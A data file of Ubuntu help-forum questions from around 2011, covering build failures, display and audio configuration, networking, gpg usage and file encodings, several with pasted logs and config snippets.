50167	why is my lame install failing ?	i want to install ffmpeg with mp3lame enabled following this tutorial . in step 2 an error was reported on libfaac not found , and in step 5 installing lame throwing this error . why is this failing , and what should i do ? reach121 @ youngib : ~/lame-3.98.4 $ sudo checkinstall -- pkgname=lame-ffmpeg -- pkgversion= '' 3.98.4 '' -- backup=no -- default -- deldoc=yes checkinstall 1.6.2 , copyright 2009 felipe eduardo sanchez diaz duran this software is released under the gnu gpl . ***************************************** **** debian package creation selected *** ***************************************** this package will be built according to these values : 0 - maintainer : [ root @ youngib ] 1 - summary : [ package created with checkinstall 1.6.2 ] 2 - name : [ lame-ffmpeg ] 3 - version : [ 3.98.4 ] 4 - release : [ 1 ] 5 - license : [ gpl ] 6 - group : [ checkinstall ] 7 - architecture : [ amd64 ] 8 - source location : [ lame-3.98.4 ] 9 - alternate source location : [ ] 10 - requires : [ ] 11 - provides : [ lame-ffmpeg ] 12 - conflicts : [ ] 13 - replaces : [ ] enter a number to change any of them or press enter to continue : installing with make install ... ========================= installation results =========================== making install in mpglib make [ 1 ] : entering directory `/home/reach121/lame-3.98.4/mpglib' make [ 2 ] : entering directory `/home/reach121/lame-3.98.4/mpglib' make [ 2 ] : nothing to be done for `install-exec-am ' . make [ 2 ] : nothing to be done for `install-data-am ' . make [ 2 ] : leaving directory `/home/reach121/lame-3.98.4/mpglib' make [ 1 ] : leaving directory `/home/reach121/lame-3.98.4/mpglib' making install in libmp3lame make [ 1 ] : entering directory `/home/reach121/lame-3.98.4/libmp3lame' making install in i386 make [ 2 ] : entering directory `/home/reach121/lame-3.98.4/libmp3lame/i386' make [ 3 ] : entering directory `/home/reach121/lame-3.98.4/libmp3lame/i386' make [ 3 ] : nothing to be done for `install-exec-am ' . make [ 3 ] : nothing to be done for `install-data-am ' . make [ 3 ] : leaving directory `/home/reach121/lame-3.98.4/libmp3lame/i386' make [ 2 ] : leaving directory `/home/reach121/lame-3.98.4/libmp3lame/i386' making install in vector make [ 2 ] : entering directory `/home/reach121/lame-3.98.4/libmp3lame/vector' make [ 3 ] : entering directory `/home/reach121/lame-3.98.4/libmp3lame/vector' make [ 3 ] : nothing to be done for `install-exec-am ' . make [ 3 ] : nothing to be done for `install-data-am ' . make [ 3 ] : leaving directory `/home/reach121/lame-3.98.4/libmp3lame/vector' make [ 2 ] : leaving directory `/home/reach121/lame-3.98.4/libmp3lame/vector' make [ 2 ] : entering directory `/home/reach121/lame-3.98.4/libmp3lame' make [ 3 ] : entering directory `/home/reach121/lame-3.98.4/libmp3lame' test -z `` /usr/local/lib '' || /bin/mkdir -p `` /usr/local/lib '' /bin/bash ../libtool -- mode=install /usr/bin/install -c 'libmp3lame.la ' '/usr/local/lib/libmp3lame.la' /usr/bin/install -c .libs/libmp3lame.lai /usr/local/lib/libmp3lame.la /usr/bin/install -c .libs/libmp3lame.a /usr/local/lib/libmp3lame.a chmod 644 /usr/local/lib/libmp3lame.a ranlib /usr/local/lib/libmp3lame.a path= '' $ path : /sbin '' ldconfig -n /usr/local/lib -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- libraries have been installed in : /usr/local/lib if you ever happen to want to link against installed libraries in a given directory , libdir , you must either use libtool , and specify the full pathname of the library , or use the `-llibdir' flag during linking and do at least one of the following : - add libdir to the `ld_library_path ' environment variable during execution - add libdir to the `ld_run_path ' environment variable during linking - use the `-wl , -- rpath -wl , libdir ' linker flag - have your system administrator add libdir to `/etc/ld.so.conf' see any operating system documentation about shared libraries for more information , such as the ld ( 1 ) and ld.so ( 8 ) manual pages . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- make [ 3 ] : nothing to be done for `install-data-am ' . make [ 3 ] : leaving directory `/home/reach121/lame-3.98.4/libmp3lame' make [ 2 ] : leaving directory `/home/reach121/lame-3.98.4/libmp3lame' make [ 1 ] : leaving directory `/home/reach121/lame-3.98.4/libmp3lame' making install in frontend make [ 1 ] : entering directory `/home/reach121/lame-3.98.4/frontend' make [ 2 ] : entering directory `/home/reach121/lame-3.98.4/frontend' test -z `` /usr/local/bin '' || /bin/mkdir -p `` /usr/local/bin '' /bin/bash ../libtool -- mode=install /usr/bin/install -c 'lame ' '/usr/local/bin/lame' /usr/bin/install -c lame /usr/local/bin/lame make [ 2 ] : nothing to be done for `install-data-am ' . make [ 2 ] : leaving directory `/home/reach121/lame-3.98.4/frontend' make [ 1 ] : leaving directory `/home/reach121/lame-3.98.4/frontend' making install in dll make [ 1 ] : entering directory `/home/reach121/lame-3.98.4/dll' make [ 2 ] : entering directory `/home/reach121/lame-3.98.4/dll' make [ 2 ] : nothing to be done for `install-exec-am ' . make [ 2 ] : nothing to be done for `install-data-am ' . make [ 2 ] : leaving directory `/home/reach121/lame-3.98.4/dll' make [ 1 ] : leaving directory `/home/reach121/lame-3.98.4/dll' making install in debian make [ 1 ] : entering directory `/home/reach121/lame-3.98.4/debian' make [ 2 ] : entering directory `/home/reach121/lame-3.98.4/debian' make [ 2 ] : nothing to be done for `install-exec-am ' . make [ 2 ] : nothing to be done for `install-data-am ' . make [ 2 ] : leaving directory `/home/reach121/lame-3.98.4/debian' make [ 1 ] : leaving directory `/home/reach121/lame-3.98.4/debian' making install in doc make [ 1 ] : entering directory `/home/reach121/lame-3.98.4/doc' making install in html make [ 2 ] : entering directory `/home/reach121/lame-3.98.4/doc/html' make [ 3 ] : entering directory `/home/reach121/lame-3.98.4/doc/html' make [ 3 ] : nothing to be done for `install-exec-am ' . test -z `` /usr/local/share/doc/lame/html '' || /bin/mkdir -p `` /usr/local/share/doc/lame/html '' /bin/mkdir : can not create directory `/usr/local/share/doc ' : no such file or directory make [ 3 ] : *** [ install-pkghtmldata ] error 1 make [ 3 ] : leaving directory `/home/reach121/lame-3.98.4/doc/html' make [ 2 ] : *** [ install-am ] error 2 make [ 2 ] : leaving directory `/home/reach121/lame-3.98.4/doc/html' make [ 1 ] : *** [ install-recursive ] error 1 make [ 1 ] : leaving directory `/home/reach121/lame-3.98.4/doc' make : *** [ install-recursive ] error 1 **** installation failed . aborting package creation . cleaning up ... ok bye . reach121 @ youngib : ~/lame-3.98.4 $
50170	how to convert pdf to image ?	i have requirement of converting pdf pages to images . there is a background image with some text written , so when i save this as image only background image got saved . is there any software available for the same so that complete page can be converted to image ?
50171	how do i use gpg-agent as with ssh-agent+ssh-add ?	ssh-agent is very easy to use , i start it and add keys using ssh-add keyfile . after killing the process ssh-agent , all files are gone . how can i get the same behavior with gpg-agent ? the closest program i found was gpg-preset-passphrase . but looking at the manual page of gpg-agent , it seems that a directory is created for storing private keys . i could be wrong , so i 'm wondering how i can setup gpg-agent in such a way that no files/ directories are created ? if it 's not possible , other suggestions to make gpg-agent work like ssh-agent + ssh-add would be welcome too . i 'm not looking for gui solutions like seahorse .
50174	connect laptop using ubuntu 11.04 to tv ?	my laptop is compaq presario cq42 . i tried to connect my laptop ( using ubuntu 11.04 ) to my tv with vga cable . the bootloader menu and login screen are displayed on tv but after logged in , it showed no signal . i tried to change resolution of tv but nothing change ( do it in both monitors and ati analys control ( admin ) ) . here 's my /etc/x11/xorg.conf : section `` serverlayout '' identifier `` amdcccle layout '' screen 0 `` amdcccle-screen [ 1 ] -0 '' 0 0 endsection section `` module '' load `` glx '' endsection section `` monitor '' identifier `` 0-lvds '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1366x768 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` monitor '' identifier `` 0-crt1 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1366x768 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` device '' identifier `` amdcccle-device [ 1 ] -0 '' driver `` fglrx '' option `` monitor-lvds '' `` 0-lvds '' option `` monitor-crt1 '' `` 0-crt1 '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` default screen '' defaultdepth 24 endsection section `` screen '' identifier `` amdcccle-screen [ 1 ] -0 '' device `` amdcccle-device [ 1 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection run : sudo lshw gives me : *-display description : vga compatible controller product : m93 [ mobility radeon hd 4500 series ] vendor : ati technologies inc physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=fglrx_pci latency=0 resources : irq:45 memory:80000000-8fffffff ioport:4000 ( size=256 ) memory:94000000-9400ffff memory:94020000-9403ffff please help ! !
50177	where is the java library class files located in file system	i have installed netbeans 6.9 just by one click thru ubuntu software center . it did n't ask me for jdk installation folder during installation . it works . i want to check classpath variable just for learning purpose . but for the command echo $ classpath . it only gives a newline output . i have checked for jdk directory in /usr/local directory . but i ca n't find jdk directory . my questions are : where is the class files of api located in file system ? system is a class in package `` java.lang '' . then the system class file must be in the path of /some/where/java/lang/system.class . i want the path where the `` java/lang/system.class '' file resides . where is the packages physically located in file system ? here the package means java package such as `` java.lang '' or `` java.io '' ( i want just to know for learning purpose )
50181	which is the best ubuntu flavor for an old laptop ?	i have a very old toshiba laptop . specs can be found here . what would be the best distribution for this machine ? does anyone have some suggestions ? i only have 512 mb of ram .
50187	problem when creating aditional users	i just upgraded to ubuntu 11.04 . i 've no issues with creating users , but if they login an error occurs . for example , when i create the user `` luli '' and login with that user , i got the error : could not update iceauthority file /home/luli/.iceauthority i can only see the cursor and the background , then : there is a problem with the configuration server . ( usr/lib/libgconf2-4/gconf-sanity-check-2 exited with state 256 ) then a notification shows up an the right up corner : could not apply the stored configuration for monitor . and finally another error message : nautilus could not create the following folders : /home/luli/desktop and /home/luli/.nautilus . before running nautilus , please create this folders , or set permissions such that nautilus can create them . then nothing else happens , and i have to restart the computer . i looked for this error on the internet and someone said that fixed with changing permissions to the folders manually . i created those folders , as said on the last error message , and set the permissions using : sudo chmod 755 /home/luli/ sudo chown luli : luli /home/luli/ then i copied the archive .iceauthority form my personal user folder , to the new user 's folder and used this : sudo chmod 600 /home/luli/.iceauthority sudo chown luli : luli /home/luli/.iceauthority and i got nothing to change , it still not work . i have to add that a couple of days ago i moved the /home folder to its own partition , in order to have my files more independent from the system . i did that following this steps : http : //embraceubuntu.com/2006/01/29/move-home-to-its-own-partition/ thank you for your time !
50191	losing ip addresses , during cable disconnects	i have two ubuntu pcs whose network cards connected directly to each other with cross-over cable . i have assigned ip addresses manually to their interfaces using command similar to ifconfig eth0 192.168.2.1 up the problem is that every time i physically disconnect those pcs , the connection goes down and next time when i connect it back , the ip addresses are lost . also whatever applications i have bound to those addresses before disconnect needs restarting two . is there a way to keep network interfaces up during physical cable disconnect so the apps which create listening sockets on those addresses , would not need to be restarted after re-connect ?
50194	sharing internet between network interfaces	i have a laptop with lubuntu 11 with two network interfaces , wireless and wired . wireless interface connects to the router with dhcp and provides access to the internet . the wired interface has a staic ip address from a different range for internal lan . i would like to allow computers on the lan get access to internet using laptop 's wireless connection . what are my options here ? do i need a bridge , nat , firewall ?
50197	can not connect to samba share from nautilus	i have ubuntu 10.04 and i would like to connect to my samba shares which are on a dlink dns323 . from nautilus in `` places '' - > `` network '' i can easily navigate to the dnd323 and see the available shares . when i select one of the password-less share i have access to it as expected . when i want to connect to a password protected share , it does n't work . all it does is asking the password again and again . i tried to mount the share manually and it worked the first time with sudo mount -t cifs -o username=user , password=pass //xxx.xxx.xxx.xxx/share ~/share any idea why this is not working in nautilus ?
50201	how to enable shmconfig ?	how to enable shmconfig on ubuntu 11.04 ? i 'm trying to change touchpad 's configuration on run-time , but ca n't because it needs for shmconfig to be enabled , how can i do that ?
50202	can i be notified about blocked connection attempts ?	my computer is running ubuntu 10.10 and i would like to know if there is a firewall that actively informs me when a certain program is trying to access the internet or when a connection attempt is blocked from the internet . i remember zonealarm for windows will alert you to blocked attempts but now that i have switched to ubuntu i 'm not so sure . all my searching leads me to is gufw .
50203	debuild ignoring deletion of file	i want to build package for ppa . i use debuild -s -sa . but it ignore deletion of files from old source.like : dpkg-source : warning : ignoring deletion of file sonata/rhapsodycovers.py all you can see at paste.ubuntu.com how i can fix it ?
50210	how do i remap my capslock key to be alt + tab ?	how do i remap my capslock key to be alt + tab . and shift + capslock to be shift + alt + tab ?
50211	on an ssd , are there any advantages to a swap partition over a swap file ?	if my only `` hard drive '' is a smallish ssd , are there any advantages to setting up a swap partition rather than a swap file ?
50213	custom text screensaver	thinking about what would be useful to display in a screensaver , i realized that it would be nice to know how long the screensaver has been running . gnome-screensaver-command -- time takes care of that . now , how can i create a simple screensaver based on this value ( plus perhaps some ps output ) , updating it at regular intervals ?
50215	i ca n't change audio/volume preferences ?	when i click to sound icon on the panel , i have 3 options : '' mute all '' is gray and could not be clicked slider - i can slide but it doesnt change anything preferences - shows this ( waiting for the response from audio device ) , but it does n't show anything for more than a hour this is from aplay -l : root @ fb : ~ # aplay -l **** list of playback hardware devices **** card 0 : sb [ hda ati sb ] , device 0 : alc272 analog [ alc272 analog ] subdevices : 1/1 subdevices # 0 : subdevice # 0 karta 1 : hdmi [ hda ati hdmi ] , device 3 : ati hdmi [ ati hdmi ] subdevices : 1/1 subdevices # 0 : subdevice # 0 root @ fb : ~ # what 's wrong ?
50220	failed to install gnome3 with 404 error	i followed the instructions here , however i got 404 not found error checking for updates : w : failed to fetch http : //ppa.launchpad.net/ubuntugnometeam/gnome3/ubuntu/dists/natty/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/ubuntugnometeam/gnome3/ubuntu/dists/natty/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . , thus i could n't even start the installation . anybody know how to perform a full installation ? now got new error : w : failed to fetch http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu/dists/natty/main/i18n/translation-en connection failed , e : some index files failed to download . they have been ignored , or old ones used instead . and these are all the files in sources.list.d : gnome3-team-gnome3-natty.list gnome3-team-gnome3-natty.list.save mozillateam-firefox-stable-maverick.list mozillateam-firefox-stable-maverick.list.distupgrade mozillateam-firefox-stable-maverick.list.save pidgin-ppa.list pidgin-ppa.list.distupgrade pidgin-ppa.list.save
50224	how to make user created software and folder searchable by unity ?	i have created a new folder in home directory , and put a downloaded program in this folder , how to make both this folder and program searchable by the system when using quick launch/search utility ?
50228	how do i enable desktop effects with hybrid nvidia/intel graphic card ?	to turn on/off between the 2 cards , i used acpi_call and bumblebee as in this article : https : //launchpad.net/~hybrid-graphics-linux it works . however , from the first time i install a fresh ubuntu and also now , i ca n't enable desktop visual effects . even if turning on nvidia card . my laptop is asus k53sv , core i7 sandy bridge . do n't know what the problem is ? update : intel integrated card info using lshw command : *-display description : vga compatible controller product : sandy bridge integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:45 memory : dd400000-dd7fffff memory : b0000000-bfffffff ioport : e000 ( size=64 )
50233	disable ctrl+alt+f4 switching to virtual terminal	is there a way that i can stop the ctrl+alt+f4 key combination from switching to a virtual terminal ? i still want the other key combinations to switch to terminals - i just want to change the f4 one because i often use that keyboard shortcut in a windows vm .
50234	disable f1 in terminal	i found this deactivate f1 and f10 keybindings ? but it does n't describe how f1 could be disabled . is there a way that i can stop the f1 key from showing help ? i do click it many times when i 'm tired and when i want to press f2 ( save in mc editor )
50236	make does not run with `` sudo pecl install pdo '' , why ?	here is the log file , make does not run . i followed the instructions by ronald bauman here . below you can find the point where it fails . how can i debug this ? /bin/bash /tmp/pear/temp/pear-build-rootq7rxq6/pdo-1.0.3/libtool -- mode=compile cc -i . -i/tmp/pear/temp/pdo -dphp_atom_inc -i/tmp/pear/temp/pear-build-rootq7rxq6/pdo-1.0.3/include -i/tmp/pear/temp/pear-build-rootq7rxq6/pdo-1.0.3/main -i/tmp/pear/temp/pdo -i/usr/include/php5 -i/usr/include/php5/main -i/usr/include/php5/tsrm -i/usr/include/php5/zend -i/usr/include/php5/ext -i/usr/include/php5/ext/date/lib -d_largefile_source -d_file_offset_bits=64 -dhave_config_h -g -o2 -c /tmp/pear/temp/pdo/pdo.c -o pdo.lo libtool : compile : cc -i . -i/tmp/pear/temp/pdo -dphp_atom_inc -i/tmp/pear/temp/pear-build-rootq7rxq6/pdo-1.0.3/include -i/tmp/pear/temp/pear-build-rootq7rxq6/pdo-1.0.3/main -i/tmp/pear/temp/pdo -i/usr/include/php5 -i/usr/include/php5/main -i/usr/include/php5/tsrm -i/usr/include/php5/zend -i/usr/include/php5/ext -i/usr/include/php5/ext/date/lib -d_largefile_source -d_file_offset_bits=64 -dhave_config_h -g -o2 -c /tmp/pear/temp/pdo/pdo.c -fpic -dpic -o .libs/pdo.o /bin/bash /tmp/pear/temp/pear-build-rootq7rxq6/pdo-1.0.3/libtool -- mode=compile cc -i . -i/tmp/pear/temp/pdo -dphp_atom_inc -i/tmp/pear/temp/pear-build-rootq7rxq6/pdo-1.0.3/include -i/tmp/pear/temp/pear-build-rootq7rxq6/pdo-1.0.3/main -i/tmp/pear/temp/pdo -i/usr/include/php5 -i/usr/include/php5/main -i/usr/include/php5/tsrm -i/usr/include/php5/zend -i/usr/include/php5/ext -i/usr/include/php5/ext/date/lib -d_largefile_source -d_file_offset_bits=64 -dhave_config_h -g -o2 -c /tmp/pear/temp/pdo/pdo_dbh.c -o pdo_dbh.lo libtool : compile : cc -i . -i/tmp/pear/temp/pdo -dphp_atom_inc -i/tmp/pear/temp/pear-build-rootq7rxq6/pdo-1.0.3/include -i/tmp/pear/temp/pear-build-rootq7rxq6/pdo-1.0.3/main -i/tmp/pear/temp/pdo -i/usr/include/php5 -i/usr/include/php5/main -i/usr/include/php5/tsrm -i/usr/include/php5/zend -i/usr/include/php5/ext -i/usr/include/php5/ext/date/lib -d_largefile_source -d_file_offset_bits=64 -dhave_config_h -g -o2 -c /tmp/pear/temp/pdo/pdo_dbh.c -fpic -dpic -o .libs/pdo_dbh.o /tmp/pear/temp/pdo/pdo_dbh.c : in function ‘pdo_stmt_instantiate’ : /tmp/pear/temp/pdo/pdo_dbh.c:410:8 : error : ‘zval’ has no member named ‘refcount’ /tmp/pear/temp/pdo/pdo_dbh.c:411:8 : error : ‘zval’ has no member named ‘is_ref’ /tmp/pear/temp/pdo/pdo_dbh.c : in function ‘pdo_stmt_construct’ : /tmp/pear/temp/pdo/pdo_dbh.c:435:6 : error : ‘zend_fcall_info’ has no member named ‘object_pp’ /tmp/pear/temp/pdo/pdo_dbh.c:458:6 : error : ‘zend_fcall_info_cache’ has no member named ‘object_pp’ /tmp/pear/temp/pdo/pdo_dbh.c : in function ‘zim_pdo_setattribute’ : /tmp/pear/temp/pdo/pdo_dbh.c:752:12 : error : ‘zval’ has no member named ‘refcount’ /tmp/pear/temp/pdo/pdo_dbh.c : in function ‘zim_pdo_getattribute’ : /tmp/pear/temp/pdo/pdo_dbh.c:818:28 : error : ‘zval’ has no member named ‘refcount’ /tmp/pear/temp/pdo/pdo_dbh.c : in function ‘pdo_hash_methods’ : /tmp/pear/temp/pdo/pdo_dbh.c:1122:24 : warning : assignment discards qualifiers from pointer target type /tmp/pear/temp/pdo/pdo_dbh.c:1126:20 : warning : assignment discards qualifiers from pointer target type make : *** [ pdo_dbh.lo ] error 1 error : `make ' failed
50239	apache2 is making my amazon ec2 unavailable , any ideas ?	i have a web server running on a ec2 c1.medium intance . the instance is running on ubuntu , with apache2 and mysql.the ubuntu and apache version are the next ; ubuntu distrib_id=ubuntu distrib_release=11.04 distrib_codename=natty distrib_description= '' ubuntu 11.04 '' apache2 server version : apache/2.2.17 ( ubuntu ) server built : feb 22 2011 18:33:02 sometimes randomly , my server `` hangs up '' , i can not connect to it using normal web access or ssh access . if i reboot the instance it reboots fine , the amazon system log does n't show anything weird , but the problem persists the only way to solve it its stopping the instance , and start it again . i think that the problem its has something to do with apache , because the last lines of the error log lists : normal errors [ sun jun 19 06:25:09 2011 ] [ notice ] apache/2.2.17 ( ubuntu ) php/5.3.5-1ubuntu7.2 with suhosin-patch configured -- resuming normal operations nobody cant connetc ... no more erros until i stop and start the instance normal errors [ wed jun 22 14:21:18 2011 ] [ notice ] apache/2.2.17 ( ubuntu ) php/5.3.5-1ubuntu7.2 with suhosin-patch configured -- resuming normal operations nobody cant connetc ... no more erros until i stop and start the instance can somebody please help me ?
50240	how to check what kind of video card is mine ?	is there any command line or program in ubuntu 9.04 to discover which is my video card ?
50242	why does echoing these parameters with sudo not work ?	these are suggestions given by powertop to save energy : echo 1500 > /proc/sys/vm/dirty_writeback_centisecs echo 1 > /sys/module/snd_hda_intel/parameters/power_save however , i can not execute them from terminal even as sudo . ideas ?
50256	netbeans ide still on 6.9 version ?	i wonder why netbeans 6.9 is still in software center and is not replaced by 7.0 ? i mean , the new firefox package is published within a few hours after release , why is the netbeans package not updated yet ?
50257	does ubuntu 10.10 work well on mac mini ?	does ubuntu 10.10 work well on mac mini ? are there any known issues ?
50261	unable to mount my mp3 player	ever since i installed xubuntu natty , my mp3 player is not mounted any more . lsusb also does not list it . normal usb sticks are normally mounted . how can i re-enable auto-mount for it or mount it manually ?
50266	choppy usb mice on just one of usb ports	i 've got lenovo b560 laptop with latest , properly updated kubuntu on it ( 11.04 natty , kernel 2.6.38-8-generic ) . it has three usb2.0 ports onboard . i usually plug a mouse into one of them ( i 've got 3 different mice - in office , at home and for when on the go ) . sometimes , usually after laptop awakening from sleep , the mouse still works but cursor movements are choppy , as if the processor was extremely loaded ( it 's usually not ) . i found that if i re-plug the mouse cord into the other usb port , it works just fine . if i plug it back to problematic port , it is still choppy and remains choppy until next boot . of course i want my mice to always work fine . problem is : i can not reproduce this behavior for sure , it happens sporadically but regularly . i use different usb ports ( problem has ever happened on each of them since ) , i use different mice ( each has failed me this way at least once ) , i can not generally find what exactly is going wrong and why plugging to different port fixes the mouse instantly . so i 'd like to hear at least clues where to look at , what to try to identify my problem . a bit of update : while beginning this post , i had the issue once again . i have just replugged the mouse back to problematic port and it is not recognized at all . on the other port it works smoothly .
50274	fonts are not embedded into a pdf ?	i have created a pdf file using the pdflatex command but some fonts are not embedded into it . please see the output of pdffonts . i have also checked `` updmap -- edit '' to see whether the option `` pdftexdownloadbase14 '' is true or not . it is true . but , still some fonts are not emebedded . please help me to resolve this .
50277	how to recover from mistakenly chmod operation ?	i screwed up all my files permissions under a directory , how can i recover . especially , how to change the files that is non-executable back to read-write-only ? what i did wrong was that i chmod all the files and directories executable of the user .
50279	how can i play .bin file with vlc ?	for two days i have tried to get vlc play this .bin file . i played it fine in windows xp using vlc . so i decided to install same vlc thats on my xp partition and it plays through wine the file no problem . why wo n't it play natively ? fr33bird @ fr33bird-desktop : ~/downloads/********/********* $ vlc ********.bin vlc media player 1.1.10 the luggage ( revision exported ) blocked : call to unsetenv ( `` dbus_activation_address '' ) blocked : call to unsetenv ( `` dbus_activation_bus_type '' ) [ 0x8387914 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . blocked : call to setlocale ( 6 , `` '' ) warning : call to srand ( 1309627174 ) warning : call to rand ( ) blocked : call to setlocale ( 6 , `` '' ) ( process:14474 ) : gtk-warning ** : locale not supported by c library . using the fallback 'c ' locale . blocked : call to setlocale ( 6 , `` '' ) libdvdnav : using dvdnav version 4.1.3 libdvdread : using libdvdcss version 1.2.10 for dvd access libdvdread : ca n't stat /home/fr33bird/downloads/*******/*******/*******.bin no such file or directory libdvdnav : vm : failed to open/read the dvd [ 0x87034e4 ] filesystem access error : can not open file /home/fr33bird/downloads/*****/*****/*******.bin ( no such file or directory ) [ 0x843535c ] main input error : open of `file : ///home/fr33bird/downloads/******/****/********.bin ' failed : ( null ) funny it says no such file even thou it 's attempting to read it . xine says that the .bin is encrypted so i installed libdvdcss2 w32codecs ubuntu-restricted-codecs from medibuntu still same issue . how can i fix this ? i want to run this natively not through wine . i even tried to change .bin to .mpg and .avi . updated 6-26-2011 even thou this issue did n't have anything to do with alsa audio output this allows me to play .bin files alsa does n't wo n't in vlc
50282	why ca n't tuxboot and ubuntu play well together ?	i 'm trying to get clonezilla to run off of a usb stick , and it seems that the right way to do that is via tuxboot . tuxboot is not compilable on ubuntu . i used git to get it from the repository , and then when i run the 'install ' script ( because building it is apparently not allowed , since the build script just tries to install windows things ) . qmake-linux wants my qmake executable to be in the same directory as the stuff i pulled down , and let 's just say that if there 's a way to do this easily , i ai n't seein ' it . so then i download the linux file , the most recent of which is tuxboot-linux-25 . try to run it , get a failure that libpng12.so.0 is n't found . ok , then i go to install that via the instructions i found on the web but firefox seems to have already deleted from my history ( yay ! ) then i add the /usr/local/lib directory to ldconfig via emacs ( had to install that too , of course ) : http : //ubuntuforums.org/showthread.php ? t=369848 i still get the errors that libpng12.so.0 can not be opened because 'no such file or directory ' . ldconfig -p | grep libpng shows that the library is there , but it still does n't seem to be findable . what to do next ? ( for the record , doing this in windows is painless -- download , click , and it 's done . but i 'm trying to be all linuxy and get away from windows for this ... )
50284	clonezilla failing as soon as image copying begins	i have been trying unsuccessfully to create an image of an ubuntu 10.04 laptop system . as soon as the copying itself starts , the entire system crashes to a black screen . i suspect that the problem is overheating , and that 's why i put an ice pack under the machine . that seems to have helped a bit , but it 's still not getting through the copying process . is there any other possible explanation for dying to a black screen like this ? i 'm just not relishing the task of removing the hard drive , mounting it elsewhere , and then doing a backup that way .
50286	why might ubuntu be slow for me while using wubi ?	i 'm new to linux/ubuntu in general . i just wubi installed ubuntu 11.04 w/windows 7 on my lenovo laptop - intel i7 quad core 2ghz , 4gb ram , etc . etc ... and for some reason ubuntu is very laggy and slow . when i 'm switching between programs ( chromium , folders , software center , etc.. ) it does n't run as smoothly as windows 7 ( i have no more than 3 programs/windows up at a time ... ) . i do n't think it 's my system requirements because linux oss are known to use low system resources . i installed it using wubi - should i do a reinstall ? i 've already done all the recommended updates..
50288	upgrade to xubuntu 11.04 breaks wireless	when i tried to connect at 2 different places . the little connection icon would circle forever before eventually prompting for password . i have triple checked all network keys & then some . even with my home network i now have to revert to 10.04 lts lucid lynx ( dual boot ) or wired ethernet . not even sure where to start trouble shooting tbh ? my card is a edimax ew-7108pcg pcmcia card which i bought for it 's out the box linux compatibility . hardware is an ibm thinkpad t21 .
50291	gpg workflow in 11.04	at work we handle the transfer of small bits of sensitive data with gpg , usually posted on a secure internal website . until firefox 4 was released , we used firegpg for inline decryption ; however the ipc libraries that it relied upon were no longer present in ff4 , rendering it unusable . with the launch of firefox 5 , firegpg will no longer install . currently i 'm manually pasting the gpg blocks into a text file , then using the nautilus context-menu plugin or the command line to decrypt the contents of the file . when we 're handling a large amount of these small files throughout the day this starts to become a real chore . i 've looked around but ca n't seem to find much information on useful gpg clients in ubuntu . a client that allowed me to paste in a gpg block and instantly decrypt it , and also paste in plaintext and easily encrypt it for multiple recipients would be ideal . so my question is does this exist ? i ca n't seem to find anything about this with obvious searches on google , so hopefully someone here can help , or offer an alternative workflow .
50292	how can i find a file 's path in the text encoding used by posterazor ?	posterazor uses an apparently outdated gui that is incapable of properly displaying my filenames : for the sake of convenience , i want to be able to open any file in posterazor by copying and pasting its path from nautilus . this works in other applications , but sadly , posterazor is unable to understand the path : how can i convert the path that nautilus generates into a text encoding that is compatible with posterazor ? the ubuntu package for posterazor lists a dependency on the fast light toolkit ( fltk ) . its programmer 's documentation on unicode looks like it might contain the necessary information to answer my question , but i 'm not sure how to interpret it . details some sample content : a path as it natively appears in nautilus : /home/ak/café/north-america.jpg the same path as it natively appears in posterazor : the clipboard contents after copying the path from nautilus : $ xclip -out -selection clipboard -target targets timestamp targets multiple x-special/gnome-copied-files text/uri-list utf8_string compound_text text string text/plain ; charset=utf-8 text/plain $ xclip -out -selection clipboard -target string | hexdump -c 00000000 2f 68 6f 6d 65 2f 61 6b 2f 63 61 66 e9 2f 6e 6f |/home/ak/caf./no| 00000010 72 74 68 2d 61 6d 65 72 69 63 61 2e 6a 70 67 |rth-america.jpg| 0000001f $ xclip -out -selection clipboard -target utf8_string | hexdump -c 00000000 2f 68 6f 6d 65 2f 61 6b 2f 63 61 66 c3 a9 2f 6e |/home/ak/caf../n| 00000010 6f 72 74 68 2d 61 6d 65 72 69 63 61 2e 6a 70 67 |orth-america.jpg| 00000020 $ xclip -out -selection clipboard -target text/plain | hexdump -c 00000000 2f 68 6f 6d 65 2f 61 6b 2f 63 61 66 5c 75 30 30 |/home/ak/caf\u00| 00000010 65 39 2f 6e 6f 72 74 68 2d 61 6d 65 72 69 63 61 |e9/north-america| 00000020 2e 6a 70 67 |.jpg| 00000024 $ xclip -out -selection clipboard -target 'text/plain ; charset=utf-8 ' | hexdump -c 00000000 2f 68 6f 6d 65 2f 61 6b 2f 63 61 66 c3 a9 2f 6e |/home/ak/caf../n| 00000010 6f 72 74 68 2d 61 6d 65 72 69 63 61 2e 6a 70 67 |orth-america.jpg| 00000020 the clipboard contents after copying the path from posterazor : $ xclip -out -selection clipboard -target targets string $ xclip -out -selection clipboard -target string | hexdump -c 00000000 2f 68 6f 6d 65 2f 61 6b 2f 63 61 66 c3 a9 2f 6e |/home/ak/caf../n| 00000010 6f 72 74 68 2d 61 6d 65 72 69 63 61 2e 6a 70 67 |orth-america.jpg| 00000020 posterazor after copying the path from nautilus and pasting it into posterazor : posterazor after copying the path from posterazor and pasting it into posterazor : the path copied from posterazor and pasted into chromium : 